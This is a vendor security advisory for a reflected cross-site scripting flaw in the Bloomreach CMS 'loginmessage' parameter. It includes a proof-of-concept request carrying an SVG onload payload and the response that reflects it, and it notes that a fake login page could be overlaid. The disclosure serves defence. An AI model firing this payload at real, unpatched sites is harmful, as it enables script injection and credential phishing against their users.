Bloomreach

Bloomreach Documentation version

Reflected Cross-Site Scripting found in the “loginmessage” parameter. 

Issue date: 27-10-2020
Affects versions: 14.2

Security Issue ID

SECURITY-170

 

Affected Product Version(s)
14.0.0, 14.1.0, 14.2.2


Severity 

high


Description

 

A reflected cross-site scripting vulnerability occurs when a malicious user is able to inject JavaScript
into parameters which will be reflected in the response. Because the payload is not stored in the
web application it will only be executed if, for example a malicious link is clicked.

When a user logs out of the application a message will be shown. The value set in the “loginmessage” parameter in the URL will be displayed. This value is displayed directly so any inserted HTML will be shown. This means not only it is possible to insert client-side scripts, a fake HTML login page could also be overlaid. It looks like the user must be logged out of the CMS.

Another vulnerable endpoint found was the “/cms/console” path. Which means that if a user is logged-in, the user might not be logged-in the console and thus would be vulnerable. The request below shows the payload highlighted:

GET /cms/?0&loginmessage=%3Csvg/onload%3Dalert%281%29%3E HTTP/1.1
 Host: localhost:8080
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
 Firefox/76.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: close
 Cookie: -snip-
 Upgrade-Insecure-Requests: 1

The response shows the reflected payload:

HTTP/1.1 200
 Pragma: no-cache
 Cache-Control: no-store, no-cache, max-age=0, must-revalidate
 X-Frame-Options: sameorigin
 Content-Type: text/html;charset=UTF-8
 Date: Mon, 08 Jun 2020 00:12:25 GMT
 Connection: close
 Content-Length: 12452
 -snip-
 <div class="login-feedback" id="id39">
 <ul class="feedbackPanel">
 <li class="feedbackPanelINFO">
 <span>[Warning: Property for '<svg/onload=alert(1)>' not found]</span>
 </li>
 </ul>
 </div>
 -snip-

Note that logged-in
users are redirected before the “loginmessage” is displayed so they are not affected.

 

Instructions

Customers are recommended to upgrade to the latest maintenance or minor releases as indicated above. This can be done by simply incrementing the version number of the parent POM for the implementation project.

Credit for discovering this issue

Thomas van Ruitenbeek